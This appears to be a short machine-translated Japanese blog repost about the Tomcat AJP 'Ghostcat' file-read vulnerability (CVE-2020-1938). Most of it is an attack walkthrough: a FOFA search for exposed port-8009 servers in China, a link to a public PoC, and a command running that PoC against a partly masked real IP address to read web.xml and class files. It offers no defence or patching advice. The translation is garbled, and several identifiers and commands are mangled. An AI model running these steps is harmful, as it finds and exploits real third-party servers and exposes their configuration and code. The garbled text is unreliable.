TomcatのAJPプロトコルファイルには、脆弱性が存在します(CVE-2020から1938)

TomcatのAJPプロトコルにより実装に欠陥が原因関連のパラメータ制御、攻撃者は、サーバが読み込み、特定のパラメータを作成することにより、この脆弱性を悪用することができ、ディレクトリにwebappsに任意のファイルを、しかし、親ディレクトリに越えることはできません

PoC来自GitHubのします。https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi

最初のステップ:使用FOFA検索ポート8009

ポート= " 8009 " &&国= " CN "

ステップ2:実行するPoC

python2。7 CNVD- 2020年までに - 10487 -Tomcat-Ajp-lfi.py   151 * *。。。114 -p 8009 -f /WEB-INF/web.xml

1.読むのweb.xml

2.読む*の.classファイル

おすすめ

転載: www.cnblogs.com/dgjnszf/p/12345344.html